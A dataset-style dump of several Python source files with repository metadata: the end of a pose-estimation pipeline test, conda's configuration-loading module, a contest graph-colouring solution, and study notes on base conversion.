ann_file = osp.join(data_prefix, 'test_coco.json')
coco = COCO(ann_file)
ann_info = {}
ann_info['heatmap_size'] = np.array([128, 256])
ann_info['num_joints'] = 17
ann_info['num_scales'] = 2
ann_info['scale_aware_sigma'] = False
ann_ids = coco.getAnnIds(785)
anno = coco.loadAnns(ann_ids)
mask = _get_mask(coco, anno, 785)
anno = [
obj for obj in anno if obj['iscrowd'] == 0 or obj['num_keypoints'] > 0
]
joints = _get_joints(anno, ann_info, False)
mask_list = [mask.copy() for _ in range(ann_info['num_scales'])]
joints_list = [joints.copy() for _ in range(ann_info['num_scales'])]
results = {}
results['dataset'] = 'coco'
results['image_file'] = osp.join(data_prefix, '000000000785.jpg')
results['mask'] = mask_list
results['joints'] = joints_list
results['ann_info'] = ann_info
generate_heatmap_target = BottomUpGenerateHeatmapTarget(2)
results_generate_heatmap_target = generate_heatmap_target(results)
assert 'target' in results_generate_heatmap_target
assert len(results_generate_heatmap_target['target']
) == results['ann_info']['num_scales']
def test_BottomUpGeneratePAFTarget():
ann_info = {}
ann_info['skeleton'] = [[1, 2], [3, 4]]
ann_info['heatmap_size'] = np.array([5])
ann_info['num_joints'] = 4
ann_info['num_scales'] = 1
mask = np.ones((5, 5), dtype=bool)
joints = np.array([[[1, 1, 2], [3, 3, 2], [0, 0, 0], [0, 0, 0]],
[[1, 3, 2], [3, 1, 2], [0, 0, 0], [0, 0, 0]]])
mask_list = [mask.copy() for _ in range(ann_info['num_scales'])]
joints_list = [joints.copy() for _ in range(ann_info['num_scales'])]
results = {}
results['dataset'] = 'coco'
results['mask'] = mask_list
results['joints'] = joints_list
results['ann_info'] = ann_info
generate_paf_target = BottomUpGeneratePAFTarget(1)
results_generate_paf_target = generate_paf_target(results)
sqrt = np.sqrt(2) / 2
print(results_generate_paf_target['target'])
assert (results_generate_paf_target['target'] == np.array(
[[[sqrt, sqrt, 0, sqrt, sqrt], [sqrt, sqrt, sqrt, sqrt, sqrt],
[0, sqrt, sqrt, sqrt, 0], [sqrt, sqrt, sqrt, sqrt, sqrt],
[sqrt, sqrt, 0, sqrt, sqrt]],
[[sqrt, sqrt, 0, -sqrt, -sqrt], [sqrt, sqrt, 0, -sqrt, -sqrt],
[0, 0, 0, 0, 0], [-sqrt, -sqrt, 0, sqrt, sqrt],
[-sqrt, -sqrt, 0, sqrt, sqrt]],
[[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]]],
dtype=np.float32)).all()
| [
"[email protected]"
]
| |
dc43154b2aa5893cfa927b7f35ef1427d65f1a3b | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/conda_conda/conda-master/conda/common/configuration.py | c1cc2a3d474edce74a64aadc4aa2fa940792cd7f | []
| no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 34,143 | py | # -*- coding: utf-8 -*-
"""
A generalized application configuration utility.
Features include:
- lazy eval
- merges configuration files
- parameter type validation, with custom validation
- parameter aliases
Easily extensible to other source formats, e.g. json and ini
Limitations:
- at the moment only supports a "flat" config structure; no nested data structures
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from abc import ABCMeta, abstractmethod
from collections import Mapping, defaultdict
from glob import glob
from itertools import chain
from logging import getLogger
from os import environ, stat
from os.path import basename, join
from stat import S_IFDIR, S_IFMT, S_IFREG
from enum import Enum
from .compat import (isiterable, iteritems, itervalues, odict, primitive_types, string_types,
text_type, with_metaclass)
from .constants import EMPTY_MAP, NULL
from .yaml import yaml_load
from .. import CondaError, CondaMultiError
from .._vendor.auxlib.collection import AttrDict, first, frozendict, last, make_immutable
from .._vendor.auxlib.exceptions import ThisShouldNeverHappenError
from .._vendor.auxlib.path import expand
from .._vendor.auxlib.type_coercion import TypeCoercionError, typify_data_structure
try:
from cytoolz.dicttoolz import merge
from cytoolz.functoolz import excepts
from cytoolz.itertoolz import concat, concatv, unique
except ImportError:
from .._vendor.toolz.dicttoolz import merge
from .._vendor.toolz.functoolz import excepts
from .._vendor.toolz.itertoolz import concat, concatv, unique
try:
from ruamel_yaml.comments import CommentedSeq, CommentedMap
from ruamel_yaml.scanner import ScannerError
except ImportError: # pragma: no cover
from ruamel.yaml.comments import CommentedSeq, CommentedMap # pragma: no cover
from ruamel.yaml.scanner import ScannerError
log = getLogger(__name__)
def pretty_list(iterable, padding=' '): # TODO: move elsewhere in conda.common
if not isiterable(iterable):
iterable = [iterable]
return '\n'.join("%s- %s" % (padding, item) for item in iterable)
def pretty_map(dictionary, padding=' '):
return '\n'.join("%s%s: %s" % (padding, key, value) for key, value in iteritems(dictionary))
class LoadError(CondaError):
def __init__(self, message, filepath, line, column):
self.line = line
self.filepath = filepath
self.column = column
msg = "Load Error: in %s on line %s, column %s. %s" % (filepath, line, column, message)
super(LoadError, self).__init__(msg)
class ConfigurationError(CondaError):
pass
class ValidationError(ConfigurationError):
def __init__(self, parameter_name, parameter_value, source, msg=None, **kwargs):
self.parameter_name = parameter_name
self.parameter_value = parameter_value
self.source = source
super(ConfigurationError, self).__init__(msg, **kwargs)
class MultipleKeysError(ValidationError):
def __init__(self, source, keys, preferred_key):
self.source = source
self.keys = keys
msg = ("Multiple aliased keys in file %s:\n"
"%s"
"Must declare only one. Prefer '%s'" % (source, pretty_list(keys), preferred_key))
super(MultipleKeysError, self).__init__(preferred_key, None, source, msg=msg)
class InvalidTypeError(ValidationError):
def __init__(self, parameter_name, parameter_value, source, wrong_type, valid_types, msg=None):
self.wrong_type = wrong_type
self.valid_types = valid_types
if msg is None:
msg = ("Parameter %s = %r declared in %s has type %s.\n"
"Valid types: %s." % (parameter_name, parameter_value,
source, wrong_type, pretty_list(valid_types)))
super(InvalidTypeError, self).__init__(parameter_name, parameter_value, source, msg=msg)
class InvalidElementTypeError(InvalidTypeError):
def __init__(self, parameter_name, parameter_value, source, wrong_type,
valid_types, index_or_key):
qualifier = "at index" if isinstance(index_or_key, int) else "for key"
msg = ("Parameter %s declared in %s has invalid element %r %s %s.\n"
"Valid element types:\n"
"%s." % (parameter_name, source, parameter_value, qualifier,
index_or_key, pretty_list(valid_types)))
super(InvalidElementTypeError, self).__init__(parameter_name, parameter_value, source,
wrong_type, valid_types, msg=msg)
class CustomValidationError(ValidationError):
def __init__(self, parameter_name, parameter_value, source, custom_message):
msg = ("Parameter %s = %r declared in %s is invalid.\n"
"%s" % (parameter_name, parameter_value, source, custom_message))
super(CustomValidationError, self).__init__(parameter_name, parameter_value, source,
msg=msg)
class MultiValidationError(CondaMultiError, ConfigurationError):
def __init__(self, errors, *args, **kwargs):
super(MultiValidationError, self).__init__(errors, *args, **kwargs)
def raise_errors(errors):
if not errors:
return True
elif len(errors) == 1:
raise errors[0]
else:
raise MultiValidationError(errors)
class ParameterFlag(Enum):
final = 'final'
top = "top"
bottom = "bottom"
def __str__(self):
return "%s" % self.value
@classmethod
def from_name(cls, name):
return cls[name]
@classmethod
def from_value(cls, value):
return cls(value)
@classmethod
def from_string(cls, string):
try:
string = string.strip('!#')
return cls.from_value(string)
except (ValueError, AttributeError):
return None
@with_metaclass(ABCMeta)
class RawParameter(object):
def __init__(self, source, key, raw_value):
self.source = source
self.key = key
self._raw_value = raw_value
def __repr__(self):
return text_type(vars(self))
@abstractmethod
def value(self, parameter_obj):
raise NotImplementedError()
@abstractmethod
def keyflag(self):
raise NotImplementedError()
@abstractmethod
def valueflags(self, parameter_obj):
raise NotImplementedError()
@classmethod
def make_raw_parameters(cls, source, from_map):
if from_map:
return dict((key, cls(source, key, from_map[key])) for key in from_map)
return EMPTY_MAP
class EnvRawParameter(RawParameter):
source = 'envvars'
def value(self, parameter_obj):
if hasattr(parameter_obj, 'string_delimiter'):
string_delimiter = getattr(parameter_obj, 'string_delimiter')
# TODO: add stripping of !important, !top, and !bottom
raw_value = self._raw_value
if string_delimiter in raw_value:
value = raw_value.split(string_delimiter)
else:
value = [raw_value]
return tuple(v.strip() for v in value)
else:
return self.__important_split_value[0].strip()
def keyflag(self):
return ParameterFlag.final if len(self.__important_split_value) >= 2 else None
def valueflags(self, parameter_obj):
if hasattr(parameter_obj, 'string_delimiter'):
string_delimiter = getattr(parameter_obj, 'string_delimiter')
# TODO: add stripping of !important, !top, and !bottom
return tuple('' for _ in self._raw_value.split(string_delimiter))
else:
return self.__important_split_value[0].strip()
@property
def __important_split_value(self):
return self._raw_value.split("!important")
@classmethod
def make_raw_parameters(cls, appname):
keystart = "{0}_".format(appname.upper())
raw_env = dict((k.replace(keystart, '', 1).lower(), v)
for k, v in iteritems(environ) if k.startswith(keystart))
return super(EnvRawParameter, cls).make_raw_parameters(EnvRawParameter.source, raw_env)
class ArgParseRawParameter(RawParameter):
source = 'cmd_line'
def value(self, parameter_obj):
return make_immutable(self._raw_value)
def keyflag(self):
return None
def valueflags(self, parameter_obj):
return None if isinstance(parameter_obj, PrimitiveParameter) else ()
@classmethod
def make_raw_parameters(cls, args_from_argparse):
return super(ArgParseRawParameter, cls).make_raw_parameters(ArgParseRawParameter.source,
args_from_argparse)
class YamlRawParameter(RawParameter):
# this class should encapsulate all direct use of ruamel.yaml in this module
def __init__(self, source, key, raw_value, keycomment):
self._keycomment = keycomment
super(YamlRawParameter, self).__init__(source, key, raw_value)
def value(self, parameter_obj):
self.__process(parameter_obj)
return self._value
def keyflag(self):
return ParameterFlag.from_string(self._keycomment)
def valueflags(self, parameter_obj):
self.__process(parameter_obj)
return self._valueflags
def __process(self, parameter_obj):
if hasattr(self, '_value'):
return
elif isinstance(self._raw_value, CommentedSeq):
valuecomments = self._get_yaml_list_comments(self._raw_value)
self._valueflags = tuple(ParameterFlag.from_string(s) for s in valuecomments)
self._value = tuple(self._raw_value)
elif isinstance(self._raw_value, CommentedMap):
valuecomments = self._get_yaml_map_comments(self._raw_value)
self._valueflags = dict((k, ParameterFlag.from_string(v))
for k, v in iteritems(valuecomments) if v is not None)
self._value = frozendict(self._raw_value)
elif isinstance(self._raw_value, primitive_types):
self._valueflags = None
self._value = self._raw_value
else:
raise ThisShouldNeverHappenError() # pragma: no cover
@staticmethod
def _get_yaml_key_comment(commented_dict, key):
try:
return commented_dict.ca.items[key][2].value.strip()
except (AttributeError, KeyError):
return None
@staticmethod
def _get_yaml_list_comments(value):
items = value.ca.items
raw_comment_lines = tuple(excepts((AttributeError, KeyError, TypeError),
lambda q: items.get(q)[0].value.strip() or None,
lambda _: None # default value on exception
)(q)
for q in range(len(value)))
return raw_comment_lines
@staticmethod
def _get_yaml_map_comments(rawvalue):
return dict((key, excepts(KeyError,
lambda k: rawvalue.ca.items[k][2].value.strip() or None,
lambda _: None # default value on exception
)(key))
for key in rawvalue)
@classmethod
def make_raw_parameters(cls, source, from_map):
if from_map:
return dict((key, cls(source, key, from_map[key],
cls._get_yaml_key_comment(from_map, key)))
for key in from_map)
return EMPTY_MAP
@classmethod
def make_raw_parameters_from_file(cls, filepath):
with open(filepath, 'r') as fh:
try:
ruamel_yaml = yaml_load(fh)
except ScannerError as err:
mark = err.problem_mark
raise LoadError("Invalid YAML", filepath, mark.line, mark.column)
return cls.make_raw_parameters(filepath, ruamel_yaml) or EMPTY_MAP
def load_file_configs(search_path):
# returns an ordered map of filepath and dict of raw parameter objects
def _file_yaml_loader(fullpath):
assert fullpath.endswith((".yml", ".yaml")) or "condarc" in basename(fullpath), fullpath
yield fullpath, YamlRawParameter.make_raw_parameters_from_file(fullpath)
def _dir_yaml_loader(fullpath):
for filepath in sorted(concatv(glob(join(fullpath, "*.yml")),
glob(join(fullpath, "*.yaml")))):
yield filepath, YamlRawParameter.make_raw_parameters_from_file(filepath)
# map a stat result to a file loader or a directory loader
_loader = {
S_IFREG: _file_yaml_loader,
S_IFDIR: _dir_yaml_loader,
}
def _get_st_mode(path):
# stat the path for file type, or None if path doesn't exist
try:
return S_IFMT(stat(path).st_mode)
except OSError:
return None
expanded_paths = tuple(expand(path) for path in search_path)
stat_paths = (_get_st_mode(path) for path in expanded_paths)
load_paths = (_loader[st_mode](path)
for path, st_mode in zip(expanded_paths, stat_paths)
if st_mode is not None)
raw_data = odict(kv for kv in chain.from_iterable(load_paths))
return raw_data
@with_metaclass(ABCMeta)
class Parameter(object):
_type = None
_element_type = None
def __init__(self, default, aliases=(), validation=None):
self._name = None
self._names = None
self.default = default
self.aliases = aliases
self._validation = validation
def _set_name(self, name):
# this is an explicit method, and not a descriptor/setter
# it's meant to be called by the Configuration metaclass
self._name = name
self._names = frozenset(x for x in chain(self.aliases, (name, )))
return name
@property
def name(self):
if self._name is None:
# The Configuration metaclass should call the `_set_name` method.
raise ThisShouldNeverHappenError() # pragma: no cover
return self._name
@property
def names(self):
if self._names is None:
# The Configuration metaclass should call the `_set_name` method.
raise ThisShouldNeverHappenError() # pragma: no cover
return self._names
def _raw_parameters_from_single_source(self, raw_parameters):
# while supporting parameter name aliases, we enforce that only one definition is given
# per data source
keys = self.names & frozenset(raw_parameters.keys())
matches = {key: raw_parameters[key] for key in keys}
numkeys = len(keys)
if numkeys == 0:
return None, None
elif numkeys == 1:
return next(itervalues(matches)), None
elif self.name in keys:
return matches[self.name], MultipleKeysError(raw_parameters[next(iter(keys))].source,
keys, self.name)
else:
return None, MultipleKeysError(raw_parameters[next(iter(keys))].source,
keys, self.name)
def _get_all_matches(self, instance):
# a match is a raw parameter instance
matches = []
multikey_exceptions = []
for filepath, raw_parameters in iteritems(instance.raw_data):
match, error = self._raw_parameters_from_single_source(raw_parameters)
if match is not None:
matches.append(match)
if error:
multikey_exceptions.append(error)
return matches, multikey_exceptions
@abstractmethod
def _merge(self, matches):
raise NotImplementedError()
def __get__(self, instance, instance_type):
# strategy is "extract and merge," which is actually just map and reduce
# extract matches from each source in SEARCH_PATH
# then merge matches together
if self.name in instance._cache_:
return instance._cache_[self.name]
matches, errors = self._get_all_matches(instance)
try:
result = typify_data_structure(self._merge(matches) if matches else self.default,
self._element_type)
except TypeCoercionError as e:
errors.append(CustomValidationError(self.name, e.value, "<<merged>>", text_type(e)))
else:
errors.extend(self.collect_errors(instance, result))
raise_errors(errors)
instance._cache_[self.name] = result
return result
def collect_errors(self, instance, value, source="<<merged>>"):
"""Validate a Parameter value.
Args:
instance (Configuration): The instance object to which the Parameter descriptor is
attached.
value: The value to be validated.
"""
errors = []
if not isinstance(value, self._type):
errors.append(InvalidTypeError(self.name, value, source, type(value),
self._type))
elif self._validation is not None:
result = self._validation(value)
if result is False:
errors.append(ValidationError(self.name, value, source))
elif isinstance(result, string_types):
errors.append(CustomValidationError(self.name, value, source, result))
return errors
def _match_key_is_important(self, raw_parameter):
return raw_parameter.keyflag() is ParameterFlag.final
def _first_important_matches(self, matches):
idx = first(enumerate(matches), lambda x: self._match_key_is_important(x[1]),
apply=lambda x: x[0])
return matches if idx is None else matches[:idx+1]
@staticmethod
def _str_format_flag(flag):
return " #!%s" % flag if flag is not None else ''
@staticmethod
def _str_format_value(value):
if value is None:
return 'None'
return value
@classmethod
def repr_raw(cls, raw_parameter):
raise NotImplementedError()
class PrimitiveParameter(Parameter):
"""Parameter type for a Configuration class that holds a single python primitive value.
The python primitive types are str, int, float, complex, bool, and NoneType. In addition,
python 2 has long and unicode types.
"""
def __init__(self, default, aliases=(), validation=None, parameter_type=None):
"""
Args:
default (Any): The parameter's default value.
aliases (Iterable[str]): Alternate names for the parameter.
validation (callable): Given a parameter value as input, return a boolean indicating
validity, or alternately return a string describing an invalid value. Returning
`None` also indicates a valid value.
parameter_type (type or Tuple[type]): Type-validation of parameter's value. If None,
type(default) is used.
"""
self._type = type(default) if parameter_type is None else parameter_type
self._element_type = self._type
super(PrimitiveParameter, self).__init__(default, aliases, validation)
def _merge(self, matches):
important_match = first(matches, self._match_key_is_important, default=None)
if important_match is not None:
return important_match.value(self)
last_match = last(matches, lambda x: x is not None, default=None)
if last_match is not None:
return last_match.value(self)
raise ThisShouldNeverHappenError() # pragma: no cover
def repr_raw(self, raw_parameter):
return "%s: %s%s" % (raw_parameter.key,
self._str_format_value(raw_parameter.value(self)),
self._str_format_flag(raw_parameter.keyflag()))
class SequenceParameter(Parameter):
"""Parameter type for a Configuration class that holds a sequence (i.e. list) of python
primitive values.
"""
_type = tuple
def __init__(self, element_type, default=(), aliases=(), validation=None,
string_delimiter=','):
"""
Args:
element_type (type or Iterable[type]): The generic type of each element in
the sequence.
default (Iterable[str]): The parameter's default value.
aliases (Iterable[str]): Alternate names for the parameter.
validation (callable): Given a parameter value as input, return a boolean indicating
validity, or alternately return a string describing an invalid value.
"""
self._element_type = element_type
self.string_delimiter = string_delimiter
super(SequenceParameter, self).__init__(default, aliases, validation)
def collect_errors(self, instance, value, source="<<merged>>"):
errors = super(SequenceParameter, self).collect_errors(instance, value)
element_type = self._element_type
for idx, element in enumerate(value):
if not isinstance(element, element_type):
errors.append(InvalidElementTypeError(self.name, element, source,
type(element), element_type, idx))
return errors
def _merge(self, matches):
# get matches up to and including first important_match
# but if no important_match, then all matches are important_matches
relevant_matches = self._first_important_matches(matches)
# get individual lines from important_matches that were marked important
# these will be prepended to the final result
def get_marked_lines(match, marker, parameter_obj):
return tuple(line
for line, flag in zip(match.value(parameter_obj),
match.valueflags(parameter_obj))
if flag is marker) if match else ()
top_lines = concat(get_marked_lines(m, ParameterFlag.top, self) for m in relevant_matches)
# also get lines that were marked as bottom, but reverse the match order so that lines
# coming earlier will ultimately be last
bottom_lines = concat(get_marked_lines(m, ParameterFlag.bottom, self) for m in
reversed(relevant_matches))
# now, concat all lines, while reversing the matches
# reverse because elements closer to the end of search path take precedence
all_lines = concat(m.value(self) for m in reversed(relevant_matches))
# stack top_lines + all_lines, then de-dupe
top_deduped = tuple(unique(concatv(top_lines, all_lines)))
# take the top-deduped lines, reverse them, and concat with reversed bottom_lines
# this gives us the reverse of the order we want, but almost there
# NOTE: for a line value marked both top and bottom, the bottom marker will win out
# for the top marker to win out, we'd need one additional de-dupe step
bottom_deduped = unique(concatv(reversed(tuple(bottom_lines)), reversed(top_deduped)))
# just reverse, and we're good to go
return tuple(reversed(tuple(bottom_deduped)))
def repr_raw(self, raw_parameter):
lines = list()
lines.append("%s:%s" % (raw_parameter.key,
self._str_format_flag(raw_parameter.keyflag())))
for q, value in enumerate(raw_parameter.value(self)):
valueflag = raw_parameter.valueflags(self)[q]
lines.append(" - %s%s" % (self._str_format_value(value),
self._str_format_flag(valueflag)))
return '\n'.join(lines)
def _get_all_matches(self, instance):
# this is necessary to handle argparse `action="append"`, which can't be set to a
# default value of NULL
matches, multikey_exceptions = super(SequenceParameter, self)._get_all_matches(instance)
matches = tuple(m for m in matches if m._raw_value is not None)
return matches, multikey_exceptions
class MapParameter(Parameter):
"""Parameter type for a Configuration class that holds a map (i.e. dict) of python
primitive values.
"""
_type = dict
def __init__(self, element_type, default=None, aliases=(), validation=None):
"""
Args:
element_type (type or Iterable[type]): The generic type of each element.
default (Mapping): The parameter's default value. If None, will be an empty dict.
aliases (Iterable[str]): Alternate names for the parameter.
validation (callable): Given a parameter value as input, return a boolean indicating
validity, or alternately return a string describing an invalid value.
"""
self._element_type = element_type
super(MapParameter, self).__init__(default or dict(), aliases, validation)
def collect_errors(self, instance, value, source="<<merged>>"):
errors = super(MapParameter, self).collect_errors(instance, value)
if isinstance(value, Mapping):
element_type = self._element_type
errors.extend(InvalidElementTypeError(self.name, val, source, type(val),
element_type, key)
for key, val in iteritems(value) if not isinstance(val, element_type))
return errors
def _merge(self, matches):
# get matches up to and including first important_match
# but if no important_match, then all matches are important_matches
relevant_matches = self._first_important_matches(matches)
# mapkeys with important matches
def key_is_important(match, key):
return match.valueflags(self).get(key) is ParameterFlag.final
important_maps = tuple(dict((k, v)
for k, v in iteritems(match.value(self))
if key_is_important(match, k))
for match in relevant_matches)
# dump all matches in a dict
# then overwrite with important matches
return merge(concatv((m.value(self) for m in relevant_matches),
reversed(important_maps)))
def repr_raw(self, raw_parameter):
lines = list()
lines.append("%s:%s" % (raw_parameter.key,
self._str_format_flag(raw_parameter.keyflag())))
for valuekey, value in iteritems(raw_parameter.value(self)):
valueflag = raw_parameter.valueflags(self).get(valuekey)
lines.append(" %s: %s%s" % (valuekey, self._str_format_value(value),
self._str_format_flag(valueflag)))
return '\n'.join(lines)
class ConfigurationType(type):
"""metaclass for Configuration"""
def __init__(cls, name, bases, attr):
super(ConfigurationType, cls).__init__(name, bases, attr)
# call _set_name for each parameter
cls.parameter_names = tuple(p._set_name(name) for name, p in iteritems(cls.__dict__)
if isinstance(p, Parameter))
@with_metaclass(ConfigurationType)
class Configuration(object):
def __init__(self, search_path=(), app_name=None, argparse_args=None):
self.raw_data = odict()
self._cache_ = dict()
self._reset_callbacks = set() # TODO: make this a boltons ordered set
self._validation_errors = defaultdict(list)
if not hasattr(self, '_search_path') and search_path is not None:
# we only set search_path once; we never change it
self._search_path = search_path
if not hasattr(self, '_app_name') and app_name is not None:
# we only set app_name once; we never change it
self._app_name = app_name
self._set_search_path(search_path)
self._set_env_vars(app_name)
self._set_argparse_args(argparse_args)
def _set_search_path(self, search_path):
if not hasattr(self, '_search_path') and search_path is not None:
# we only set search_path once; we never change it
self._search_path = search_path
if getattr(self, '_search_path', None):
# we need to make sure old data doesn't stick around if we are resetting
# easiest solution is to completely clear raw_data and re-load other sources
# if raw_data holds contents
raw_data_held_contents = bool(self.raw_data)
if raw_data_held_contents:
self.raw_data = odict()
self._set_raw_data(load_file_configs(search_path))
if raw_data_held_contents:
# this should only be triggered on re-initialization / reset
self._set_env_vars(getattr(self, '_app_name', None))
self._set_argparse_args(self._argparse_args)
self._reset_cache()
return self
def _set_env_vars(self, app_name=None):
if not hasattr(self, '_app_name') and app_name is not None:
# we only set app_name once; we never change it
self._app_name = app_name
if getattr(self, '_app_name', None):
erp = EnvRawParameter
self.raw_data[erp.source] = erp.make_raw_parameters(self._app_name)
self._reset_cache()
return self
def _set_argparse_args(self, argparse_args):
# the argparse_args we store internally in this class as self._argparse_args
# will be a mapping type, not a non-`dict` object like argparse_args is natively
if hasattr(argparse_args, '__dict__'):
# the argparse_args from argparse will be an object with a __dict__ attribute
# and not a mapping type like this method will turn it into
self._argparse_args = AttrDict((k, v) for k, v, in iteritems(vars(argparse_args))
if v is not NULL)
elif not argparse_args:
# argparse_args can be initialized as `None`
self._argparse_args = AttrDict()
else:
# we're calling this method with argparse_args that are a mapping type, likely
# already having been processed by this method before
self._argparse_args = AttrDict((k, v) for k, v, in iteritems(argparse_args)
if v is not NULL)
source = ArgParseRawParameter.source
self.raw_data[source] = ArgParseRawParameter.make_raw_parameters(self._argparse_args)
self._reset_cache()
return self
def _set_raw_data(self, raw_data):
self.raw_data.update(raw_data)
self._reset_cache()
return self
def _reset_cache(self):
self._cache_ = dict()
for callback in self._reset_callbacks:
callback()
return self
def register_reset_callaback(self, callback):
self._reset_callbacks.add(callback)
def check_source(self, source):
# this method ends up duplicating much of the logic of Parameter.__get__
# I haven't yet found a way to make it more DRY though
typed_values = {}
validation_errors = []
raw_parameters = self.raw_data[source]
for key in self.parameter_names:
parameter = self.__class__.__dict__[key]
match, multikey_error = parameter._raw_parameters_from_single_source(raw_parameters)
if multikey_error:
validation_errors.append(multikey_error)
if match is not None:
try:
typed_value = typify_data_structure(match.value(parameter),
parameter._element_type)
except TypeCoercionError as e:
validation_errors.append(CustomValidationError(match.key, e.value,
match.source, text_type(e)))
else:
collected_errors = parameter.collect_errors(self, typed_value, match.source)
if collected_errors:
validation_errors.extend(collected_errors)
else:
typed_values[match.key] = typed_value # parameter.repr_raw(match)
else:
# this situation will happen if there is a multikey_error and none of the
# matched keys is the primary key
pass
return typed_values, validation_errors
def validate_all(self):
validation_errors = list(chain.from_iterable(self.check_source(source)[1]
for source in self.raw_data))
raise_errors(validation_errors)
self.validate_configuration()
@staticmethod
def _collect_validation_error(func, *args, **kwargs):
try:
func(*args, **kwargs)
except ConfigurationError as e:
return e.errors if hasattr(e, 'errors') else e,
return ()
def validate_configuration(self):
errors = chain.from_iterable(Configuration._collect_validation_error(getattr, self, name)
for name in self.parameter_names)
post_errors = self.post_build_validation()
raise_errors(tuple(chain.from_iterable((errors, post_errors))))
def post_build_validation(self):
return ()
def collect_all(self):
typed_values = odict()
validation_errors = odict()
for source in self.raw_data:
typed_values[source], validation_errors[source] = self.check_source(source)
raise_errors(tuple(chain.from_iterable(itervalues(validation_errors))))
return odict((k, v) for k, v in iteritems(typed_values) if v)
| [
"[email protected]"
]
| |
e9a512b76683460e70e8f31c4ae4f2d4f5144fb0 | 62c613e1f2bf062f807294ec6da4ae35bda6ac86 | /abc146-d.py | 195a5dc74cc33e8cfd7bc84c234a493644e42d2a | []
| no_license | teru01/python_algorithms | 6b463c78c801b68f93dda2be2f67c9688dc3cc07 | 8feb194f53b619ab7b9c964a32df7b4df32b6f2e | refs/heads/master | 2020-06-11T02:33:27.939830 | 2020-04-27T01:32:37 | 2020-04-27T01:32:37 | 193,827,088 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,178 | py | import sys
input = sys.stdin.readline
from operator import itemgetter
sys.setrecursionlimit(10000000)
INF = 10**30
from collections import deque
def main():
n = int(input().strip())
G = [[] for _ in range(n)]
A = [0] * n
B = [0] * n
for i in range(n-1):
a, b = list(map(int, input().strip().split()))
A[i] = a
B[i] = b
G[a-1].append([b-1, 0])
G[b-1].append([a-1, 0])
root = 0
mlen = len(G[0])
for i in range(n):
if mlen < len(G[i]):
mlen = len(G[i])
root = i
nodes = [0] * n
q = deque()
q.append((root, -1))
while len(q) > 0:
v, fr = q.popleft()
for y, (w, _) in enumerate(G[v]):
color = 1
if w != fr:
if fr == -1:
print(v, w)
G[v][y][1] = color
elif G[v][fr][1] != color:
G[v][y][1] = color
else:
color += 1
G[v][w][1] = color
q.append((w, v))
color += 1
for i in range(n):
print(G[i])
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
efa66284d47dc7d43341155eaa34d87506ce3814 | 982344011a248b0f514ffb8d0c87c13f2f2e113e | /day1/conv.py | a03b4d03b507ada57975e15de49aabf5b16b5d56 | []
| no_license | patrickjwolf/CS32_Architecture_GP | 7f6c68de92155b7b9b295f7d35413637cebce45a | 8704add1c6ed1f917451544e1573bed005eaa3ac | refs/heads/master | 2022-12-06T15:26:54.715887 | 2020-08-19T22:45:21 | 2020-08-19T22:45:21 | 288,225,480 | 0 | 0 | null | 2020-08-17T16:05:34 | 2020-08-17T16:05:33 | null | UTF-8 | Python | false | false | 2,567 | py | # In general, the `.format` method is considered more modern than the printf `%`
# operator.
# num = 123
# # Printing a value as decimal
# print(num) # 123
# print("%d" % num) # 123
# print("{:d}".format(num)) # 123
# print(f"{num:d}") # 123
# # Printing a value as hex
# print(hex(num)) # 0x7b
# print("%x" % num) # 7b
# print("%X" % num) # 7B
# print("%04X" % num) # 007B
# print(f"{num:x}") # 7b
# print(f"{num:X}") # 7B
# print(f"{num:04x}") # 007b
# # Printing a value as binary
# print("{:b}".format(num)) # 1111011, format method
"""
take input as a string
1111011
take input string
7b
turn in to a list
[1, 1, 1, 1, 0, 1, 1]
[7, b]
reverse the list
[1, 1, 0, 1, 1, 1, 1]
[b, 7]
multiply each element by its power of 2 respectively
1 * 1
1 * 2
0 * 4
1 * 8
1 * 16
1 * 32
1 * 64
b * 1 => 11
7 * 16 => 112
# taken the numbers and addedthem together
1 + 2 + 0 + 8 + 16 + 32 + 64
3 + 8 + 16 + 32 + 64
11 + 16 + 32 + 64
27 + 32 + 64
59 + 64
11 + 112
# returning a result in decimal
123
123
"""
# # Converting a decimal number in a string to a value
# s = "1234"; # 1234 is 0x4d2
# x = int(s); # Convert base-10 string to value
# # Printing a value as decimal and hex
# print(num) # 1234
# print(f"{num:x}") # 4d2
# # Converting a binary number in a string to a value
# s = "100101" # 0b100101 is 37 is 0x25
# x = int(s, 2) # Convert base-2 string to value
# # Printing a value as decimal and hex
# print(num) # 37
# print(f"{num:x}") # 25
# Conversion Python code:
# string1 = "10101010"
# 1 * 128
# 0 * 64
# 1 * 32
# 0 * 16
# 1 * 8
# 0 * 4
# 1 * 2
# 0 * 1
# reverse_string1 = "01010101"
# loop from 0 -> size of list - 1
# index = 0 -> 7
# base = 2
# index ** base
# 0 ** 2 => 1
# 1 ** 2 => 2
# 2 ** 2 => 4
# 3 ** 2 => 8
# 4 ** 2 => 16
# 5 ** 2 => 32
# 6 ** 2 => 64
# 7 ** 2 => 128
# multiplyer = 1 -> 128
# 0 * multiplyer
# 0 * 1 = 0
# 1 * 2 = 2
# 0 * 4 = 0
# 1 * 8 = 8
# 0 * 16 = 0
# 1 * 32 = 32
# 0 * 64 = 0
# 1 * 128 = 128
# value = 0
# value += 0
# value += 2
# value += 0
# value += 8
# value += 0
# value += 32
# value += 0
# value += 128
# ret value => 170
# [1, 0, 1, 0, 1, 0, 1, 0]
# [0, 1, 0, 1, 0, 1, 0, 1]
# digit_list[i] == 0
# + 0 * 1
# 0
# + 1 * 2
# 2
# 128 + 32 + 8 + 2
# Lets convert diferent bases to decimal
def to_decimal(num_string, base):
pass
print(to_decimal("7b", 16)) # => 123
print(to_decimal("010111010110101", 2)) # => 123 | [
"[email protected]"
]
| |
